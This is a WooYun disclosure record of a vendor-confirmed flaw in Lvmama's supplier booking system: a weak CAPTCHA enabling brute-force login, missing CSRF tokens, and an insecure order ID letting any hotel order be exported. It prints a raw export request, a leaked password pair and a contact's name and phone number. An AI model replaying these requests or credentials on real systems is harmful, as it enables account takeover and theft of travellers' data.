当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0204186

漏洞标题:驴妈妈旅游网某业务系统从验证码绕过再到任意酒店数据导出

相关厂商:驴妈妈旅游网

漏洞作者: Aasron

提交时间:2016-05-02 20:52

修复时间:2016-06-17 09:40

公开时间:2016-06-17 09:40

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-05-02: 细节已通知厂商并且等待厂商处理中
2016-05-03: 厂商已经确认,细节仅向厂商公开
2016-05-13: 细节向核心白帽子及相关领域专家公开
2016-05-23: 细节向普通白帽子公开
2016-06-02: 细节向实习白帽子公开
2016-06-17: 细节向公众公开

简要描述:

驴妈妈旅游网某业务系统从验证码绕过再到任意酒店数据导出(5.1你还敢开房吗?)

详细说明:

驴妈妈供应商管理系统

http://ebooking.lvmama.com/


1.png


#验证码可识别
验证码说实话,确实太好识别了,关于验证码算法,之前有案例
验证码太过于规则化,不具有复杂性、干扰性,色位差等原因

1.png


1.png


1.png


几乎可以达到%99.9的识别率,毫不夸张,在我发送2万次FUZZ当中只有少数无法识别
在登录框并且有密码错误等提示

1.png


测试中长度为7041为正确帐号,
返回正常内容

HTTP/1.1 200 OK
Content-Language: zh-CN
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=UTF-8
Date: Sun, 01 May 2016 12:03:19 GMT
Server: nginx2
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>驴妈妈供应商管理系统_首页</title>
<link rel="shortcut icon" type="image/x-icon" href="http://www.lvmama.com/favicon.ico">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="keywords" content="页面关键字">
<meta name="description" content="页面描述">
</head>
<body class="home">
<script type="text/javascript" src="http://pic.lvmama.com/js/new_v/jquery-1.7.2.min.js"></script>
<script type="text/javascript" src="/vst_ebooking/js/lvmamajquery.js"></script>
<link href="http://pic.lvmama.com/min/index.php?f=/styles/v4/modules/calendar.css" type="text/css" rel="stylesheet">
<link rel="stylesheet" href="http://pic.lvmama.com/min/index.php?f=/styles/v5/base.css,/styles/v5/common.css" >
<link rel="stylesheet" href="http://pic.lvmama.com/min/index.php?f=/styles/v5/modules/dialog.css,/styles/v5/modules/table.css,/styles/v5/modules/arrow.css,/styles/v5/modules/form.css,/styles/v5/modules/button.css,/styles/v5/modules/paging.css,/styles/v5/modules/tip.css" >
<!-- propage.css 项目页面样式 -->
<link rel="stylesheet" href="/vst_ebooking/css/base.css" >
<link rel="stylesheet" href="/vst_ebooking/css/easyui.css" >
<link rel="stylesheet" href="http://pic.lvmama.com/styles/v5/ebk.css"> 
<link rel="stylesheet"  href="/vst_ebooking/css/contentManage/kindEditorConf.css" type="text/css"/>
    
<script src="http://pic.lvmama.com/js/common/losc.js"></script>
<script src="http://pic.lvmama.com/js/common/losc.js"></script>
<script src="/vst_ebooking/js/My97DatePicker/WdatePicker.js"></script>
<script src="/vst_ebooking/js/notice.js"></script>
<!-- 公共头部开始  -->
<div class="header wrap clearfix">
	<div style="display: none;" id="sessionUserName">zxy</div>
    <a class="logo">驴妈妈旅游网<span>ebooking测试用</span></a> 
    <div class="adbox"></div>
    <div class="topinfo">
        <p id="welcome">欢迎您,zxy <a href="/vst_ebooking/editPwd.do">修改密码</a> <i>|</i> <a href="/vst_ebooking/loginOut.do">退出</a></p>
        <p>合作方:zhouxinyuan&nbsp;&nbsp;电话:15000480888</p>
    </div>
</div> <!--header end-->
<div class="enav wrap">
	<ul class="enav-main clearfix">
        <li class="nav-item" id="home"><a href="/vst_ebooking/index.do"><i class="icon icon-home"></i>首页</a></li>
        <li class="nav-item" id="route"><a href="/vst_ebooking/ebooking/prod/route/getRouteHome.do"><i class="icon icon-product"></i>度假线路</a></li>
        <li class="nav-item" id="ticket"><a href="/vst_ebooking/ebooking/ticket/pass/getTicketHome.do"><i class="icon icon-order"></i>门票</a></li>
        <li class="nav-item" id="hotel"><a href="/vst_ebooking/ebooking/prod/hotel/getHotelHome.do"><i class="icon icon-notice"></i>酒店</a></li>
    </ul>
    <div class="enav-nn">
    	<a href="/vst_ebooking/ebooking/announcement/announcementList.do">公告信息</a>
    	
		        <a href="/vst_ebooking/ebooking/user/findUserList.do">用户管理</a>
        
		<a id="smsConfig" href="/vst_ebooking/ebooking/sms/showSmsConfigList.do">短信提醒</a>
		<a href="/vst_ebooking/ebooking/advice/findEbkAdviceSubjectList.do">优化建议</a>
		<a href="/vst_ebooking/ebooking/manual/findEbkManualList.do">使用帮助</a>
		<a href="/vst_ebooking/ebooking/mobileversion/showMobileVersionPage.do">手机版</a>		
    </div>
</div>
<!-- 公共头部结束  -->
<script>
setInterval("autoRefreshService()",60000);
function getNowFormatDate(date) {
    //var date = new Date();
    var seperator1 = "-";
    var seperator2 = ":";
    var month = date.getMonth() + 1;
    var strDate = date.getDate();
    if (month >= 1 && month <= 9) {
        month = "0" + month;
    }
    if (strDate >= 0 && strDate <= 9) {
        strDate = "0" + strDate;
    }
    var currentdate = date.getFullYear() + seperator1 + month + seperator1 + strDate
            + " " + date.getHours() + seperator2 + date.getMinutes()
            + seperator2 + date.getSeconds();
    return new Date(currentdate);
}
function autoRefreshService(){
	//如果cookie不为空并且与当前时间比大于20分钟
	if(getCookie('ebkUser') != null && getNowFormatDate(new Date()).getTime()-new Date(getCookie('ebkUser')).getTime() > 1200000) {
		setCookie('ebkUser',getNowFormatDate(new Date()));
		$.ajax({
		url : "/vst_ebooking/autoRefreshService.do?userName=zxy",
		type : "post",
		dataType:"JSON",
		data :  $("#loginForm").serialize(),
		success : function(result) {
		}
	});
	} else if(getCookie('ebkUser') == null) {
		setCookie('ebkUser',getNowFormatDate(new Date()));
	}
	
};
var forcedChangePwdDialog;
$(function () {
	var $span = $("<span>"+  +"</span>");
    var bShouldChangePwdFlag =  $span.html();
    if(!!bShouldChangePwdFlag) {
        forcedChangePwdDialog = new xDialog("/vst_ebooking/forcedToChangePwd.do",{}, {title:'修改密码',width:800, wrapClass:'forcedChangePwd'});
    }
});
</script>
<div class="crumbs wrap">
    <p class="crumbs-link">
        <a href="#"><i class="icon icon-ihome"></i>首页</a>
    </p>
    <div class="index_remind">网页提醒:<span id="pageMessage" class="icon_guan"></span>  弹窗提醒:<span id="windowMessage" class="icon_guan"></span></div>
</div><!--//.crumbs-->
<div class="wrap">
<!--侧边栏-->
<div class="aside">
    <div class="nav-quick">
    	        <h2>线路产品</h2>
        <ul class="clearfix">
			<li>
	            <span class="libg"></span>
	            <i class="ui-arrow-right gray-ui-arrow-right"></i>
	            <a href="/vst_ebooking/ebooking/prod/route/showSelectCategory.do">新增产品</a>
	        </li>
			<li>
	            <span class="libg"></span>
	            <i class="ui-arrow-right gray-ui-arrow-right"></i>
	            <a href="/vst_ebooking/ebooking/prod/route/audit/findProductAuditList.do?currentAuditStatus=noAuditStatus">产品管理</a>
	        </li>
			<li>
            	<span class="libg"></span>
            	<i class="ui-arrow-right gray-ui-arrow-right"></i>
            	<a href="/vst_ebooking/ebooking/route_certif/route/findComfirmRouteCertifOrderList.do?certifStatus=CREATE">订单处理</a>
            </li>
			<li>
            	<span class="libg"></span>
            	<i class="ui-arrow-right gray-ui-arrow-right"></i>
            	<a href="/vst_ebooking/ebooking/prod/route/findProdOrdRouteList.do">数据管理</a>
            </li>
          </ul>
          <h2>门票产品</h2>
          <ul class="clearfix">
				<li>
	            	<span class="libg"></span>
	            	<i class="ui-arrow-right gray-ui-arrow-right"></i>
	            	<a href="/vst_ebooking/ebooking/ticket/pass/findPassList.do">通关处理
	            	</a>
	            </li>
				<li>	
	            	<span class="libg"></span>
	            	<i class="ui-arrow-right gray-ui-arrow-right"></i>
	            	<a href="/vst_ebooking/ebooking/ticket_certif/ticket/findComfirmTicketCertifOrderList.do?certifStatus=CREATE">订单处理
	            	</a>
	            </li>
				<li>	
	            	<span class="libg"></span>
	            	<i class="ui-arrow-right gray-ui-arrow-right"></i>
	            	<a href="/vst_ebooking/ebooking/ticket/pass/findPassStatisList.do">数据管理
	            	</a>
	            </li>
        </ul>
        <h2>酒店产品</h2>
          <ul class="clearfix">
				<li>
	            	<span class="libg"></span>
	            	<i class="ui-arrow-right gray-ui-arrow-right"></i>
	            	<a href="/vst_ebooking/ebooking/prod/hotel/findProductList.do">产品管理
	            	</a>
	            </li>
				<li>	
	            	<span class="libg"></span>
	            	<i class="ui-arrow-right gray-ui-arrow-right"></i>
	            	<a href="/vst_ebooking/ebooking/super_task/hotel/findConfirmTaskList.do">订单处理
	            	</a>
	            </li>
        </ul>
    </div><!--//.nav-quick-->
</div><!--//.aside-->
    
    <div class="main">
       <div class="main_box wrap">
		    <div class="hotel_info box_border">
		        <h3 class="box_title">待处理事项</h3>
		        <ul class="hotel_info_box">
					<li>
	                    <i class="icon_line"></i>
	                    <p>线路类</p>
	                    <a class="btn_dcl" href="/vst_ebooking/ebooking/route_certif/route/findComfirmRouteCertifOrderList.do?certifStatus=CREATE" target="_self">待处理订单<span>0</span>笔</a>
	                </li>
		            <li>
                    	<i class="icon_ticket"></i>
	                    <p>门票类</p>
	                    <a class="btn_dcl" href="/vst_ebooking/ebooking/ticket_certif/ticket/findComfirmTicketCertifOrderList.do?certifStatus=CREATE" target="_self">待处理订单<span>0</span>笔</a>
	                </li>
		            <li>
		                <i class="icon_hotel"></i>
		                <p>酒店类</p>
		                <!-- 调中间表-->
		                <a class="btn_dcl" href="/vst_ebooking/ebooking/order/hotel/findConfirmTaskList.do" target="_self">待处理订单<span>16</span>笔</a> 
		            </li>
		        </ul>
		    </div>
		    <div class="gonggao_info box_border">
		        <h3 class="box_title"><a href="#">更多</a>公告</h3>
		        <ul class="gonggao_list">
							<li>
						 		<span>[2016-02-23]</span> 
						 		<a href="/vst_ebooking/ebooking/announcement/announcementList.do;" onclick="ancHandler(201)">关于产品推荐上传图片卡死的问题,请大家设置页面显示为100%</a>
						 	</li>
							<li>
						 		<span>[2016-02-14]</span> 
						 		<a href="/vst_ebooking/ebooking/announcement/announcementList.do;" onclick="ancHandler(181)">关于线路订单待处理任务的提醒(默认时间段为下单时间2个月内的订单)</a>
						 	</li>
							<li>
						 		<span>[2016-01-11]</span> 
						 		<a href="/vst_ebooking/ebooking/announcement/announcementList.do;" onclick="ancHandler(161)">上线公告:线路行程录入结构化(含跟团游,当地游,自由行,机+酒)</a>
						 	</li>
							<li>
						 		<span>[2016-01-08]</span> 
						 		<a href="/vst_ebooking/ebooking/announcement/announcementList.do;" onclick="ancHandler(141)">致歉:关于已开通短信帐号8点后未收到短信提醒</a>
						 	</li>
							<li>
						 		<span>[2016-01-07]</span> 
						 		<a href="/vst_ebooking/ebooking/announcement/announcementList.do;" onclick="ancHandler(121)">短信订单短信提醒时间自定义上线公告</a>
						 	</li>
		        </ul>
		    </div>
		</div>
	</div>
</div>
<!-- 通用底部 -->
<div class="telephone_box wrap">
    <ul class="telephone_list h_162">
        <li>
            <h5>财务结算部</h5>
            <p>电话:021-60561632<br>传真:021-69108791<br>   021-69108795</p>
        </li>
        <li>
            <h5>酒店预订部</h5>
            <p>电  话:021-60561631<br>     021-60568957<br>     021-60568957<br>
            客服传真:021-69108791<br>业务传真:021-69108795</p>
        </li>
        <li>
            <h5>系统服务</h5>
            <p>电话:021-60561616<br> 转:3412</p>
        </li>
    </ul>
    <a class="btn_show" href="javascript:void(0)" target="_self"><i></i></a>
</div>
<p class="footer">
24小时旅游预订电话(免长话费):10106060 客服邮箱:service@lvmama.com<br>
Copyright©2014 www.lvmama.com 景域旅游运营集团版权所有 沪ICP备07509677
</p>
<!-- jQuery以及通用js -->
<script src="/vst_ebooking/js/pandora-dialog.js"></script>
<script src="/vst_ebooking/js/pandora-calendar.js"></script>
<script src="/vst_ebooking/js/pandora-ebk-calendar.js"></script>
<script src="/vst_ebooking/js/jquery.validate.min.js"></script>
<script src="/vst_ebooking/js/vst_validate.js"></script>
<script src="/vst_ebooking/js/messages_zh.js"></script>
<script src="/vst_ebooking/js/notice.js"></script>
<script src="/vst_ebooking/js/jquery.easyui.min-1.3.1.js"></script>
<script src="/vst_ebooking/js/jquery.validate.expand.js"></script>
<script src="/vst_ebooking/js/jquery.jsonSuggest-2.min.js"></script>
<script src="/vst_ebooking/js/vst_pet_util.js"></script>
<script src="/vst_ebooking/js/vst_util.js"></script>
<!-- 页面项目js及插件 -->
<script src="/vst_ebooking/js/lineRouteEbk.js"></script>
<script src="/vst_ebooking/js/ebk.js"></script>
<script src="/vst_ebooking/js/lvmama-dialog.js"></script>
<script src="/vst_ebooking/js/json2.js"></script>
<script>
</script>
</body>
</html>


得到几枚帐号,拿一枚权限稍微高一些的帐号进行演示

carrie 123456


1.png

漏洞证明:

1.png


1.png


#CSRF请求伪造
订单无token之类验证,得到之前订单完全可遍历

orderId=25353960


1.png


1.png


要遍历最新的订单以及已处理、未处理的订单都是很轻松
我注意到一个小细节,之前不知前人发现没有
在导出门票或酒店数据,也没令牌会话保护

1.png


POST /vst_ebooking/ebooking/order/hotel/getXLSForHotelTaskList.do HTTP/1.1
Host: ebooking.lvmama.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://ebooking.lvmama.com/vst_ebooking/ebooking/order/hotel/findAllTaskList.do
Content-Length: 142
Cookie: xxxxx
Connection: close
orderId=28536196&visitBeginTime=&visitEndTime=&certifStatus=&orderCreateBeginTime=&orderCreateEndTime=&confirmUser=&travellerName=&certifType=


这里我就结合前面的订单遍历漏洞,直接修改订单参数值orderId即可导出任意酒店数据
拿这个订单号,还是才开的房为例,导出时修改参数为订单号28536196

1.png


1.png


各种越权,各种CSRF,就到这里吧

修复方案:

1.增加会话令牌或token验证
2.验证码尽量采用复杂性或干扰性强一点的
3.在浏览订单或导出订单时做好权限的分配,尽量不要使用直接order等参数进行直接传值查询,可以使用特定标识或身份进行查询(跟条件1是一回儿事)

版权声明:转载请注明来源 Aasron@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-05-03 09:35

厂商回复:

thx

最新状态:

暂无